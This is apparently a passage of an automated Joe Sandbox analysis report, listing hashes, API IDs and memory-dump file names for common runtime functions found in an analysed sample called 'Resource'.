                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF115A32B24F158AEB00CF60E8543B933A4FB18758F040E31DA6D8A7A4DF7AD5988390
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: memcpy_s
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1502251526-0
                                                                                                                                                                                                                                                              • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                              • Instruction ID: 08884c87120e14606576054321267f5fda441523bd1372ca02abf07c2716773d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2C11473B2969687EB24CF19A24476AB7A1F794B94F408134DB4B8B744DF3EE801CB04
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                                                              • Opcode ID: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
                                                                                                                                                                                                                                                              • Instruction ID: e433d42aba55f562797b55a51639dd593dd844587d0c84e7fe26603755ced020
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17B15973A14B988BEB15CF2EC9463683BA0F784B48F148921DA5E877A4CF3BD851C715
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                                                              • Opcode ID: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                                                                                                                                                                                                                              • Instruction ID: eb641fa7be58b5e404deec7d060075abbe3933d4c99ca3578600ed66f29454f1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF08133A2869586E760CF64A5487AA7390EB447A4F440335DA6D466D4DF3ED0488A05
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                                                                                                                              • Opcode ID: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
                                                                                                                                                                                                                                                              • Instruction ID: a51ed8cb70bed5a03b94e7bff74aea54382aeb826737695e39f7a15c2f2fb315
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E1C53392866689EB6C8A15925033D33A0FF65B44F349635DA0E8779CDF3BE851C70A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                                                              • Opcode ID: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
                                                                                                                                                                                                                                                              • Instruction ID: 3de7fe7ef446a2cf408a7134d37ab648ef0272b301efc35f41ec177436d88561
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA516A63B282E546E7248E399A047697B91E754BD4F48C231CBBC87AC9DF3FD444870A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                                                              • Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                                                                                                                                              • Instruction ID: cdfe3505ee8e7df51bc5828b117dc915f67504e4f05a6571f1049fae3d2b9ffc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5A14673A2879686EB21CB29A5007AD7B91EB50BC4F04C131DE9D87799DE3FE901C702
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                              • Opcode ID: 1b049144dcca8645f5c57e32502a370ecc3fd9b97e3bd8d1628292285c2b822f
                                                                                                                                                                                                                                                              • Instruction ID: 52426b7403d3aebcbd9f642509ce4879437c8c10a3aebf6d8896b4ca65dcbe39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b049144dcca8645f5c57e32502a370ecc3fd9b97e3bd8d1628292285c2b822f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D051A617F2866341FA64EA265B1537A5391AF44BE4F088135DE0EC77E9EE7FE402420A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                                              • Opcode ID: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
                                                                                                                                                                                                                                                              • Instruction ID: 3266a57b0949b6c87c0e7a33eb23f8f0d237af137d659df439c44a1008044072
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7B09221E2BA66C6EB482B556D8A31422A87F58B00FA440B8C50D81320DE2F20F54716
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
                                                                                                                                                                                                                                                              • Instruction ID: 9593d391256c5a169b588a49f4265decd5d517b87ba5820a319d12e08e2c9277
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98D1EA6392866289EB6C8A25865033D27A0EF25B48F349235CE0DC779CDF7FD845C74A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
                                                                                                                                                                                                                                                              • Instruction ID: 693d7fbec5789d9bd161f5b9a8c63e746e07f21beeee24cc5952cf088d02853d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56C124332242F48BD698EB29E4594BA33E1F7A9349BD5403BEB874B781CA3DE404D751
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
                                                                                                                                                                                                                                                              • Instruction ID: b440b4effca4cff3aaf9508fbb0f6c6e8cde953b56ff4ec3b2dc435b5eacb4d1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79B18D7392866689E7698F39C15433D3BA0EB59F48F248135CA4E87399DF3BD441C70A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
                                                                                                                                                                                                                                                              • Instruction ID: 3e9b53e56ff445fb357312c32f70dd68fcca366dde59fb74c517251ccb57b1d6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38811773A2879146E774CF19A68037A6A91FB857D0F148235DAAE87B8DDF3FD4008B05
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                                              • Opcode ID: f79d7b8a4b9136362ee4687d07e980b4a2c8ab22ab714f4d6b7b90f4866350ce
                                                                                                                                                                                                                                                              • Instruction ID: 29916f23d60a61a5ca0bb51d360f348d3d13b8a88417dba65a7a081de2739f86
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f79d7b8a4b9136362ee4687d07e980b4a2c8ab22ab714f4d6b7b90f4866350ce
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E161D923E3C2B246F7748A28C6503796691AF40760F14463AE61FCB7D5EE7FE801871A
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                              • Instruction ID: 7294969d1b968e7a66ec8f0e836c0339e49994382810dc90723430ada4704790
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91518337A38662C6E7248B29C15433933A0EB58B58F248131DE4D977A9DF3BE853C785
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                              • Instruction ID: 5ada505f1f52097c7b0d6b13e8119cd443cf2f9618e28a3af5e808466a5efc3b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61519177A28A6182E7248F29C14873933A0EB49F68F248171CE4D977D8DF3BE852C745
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
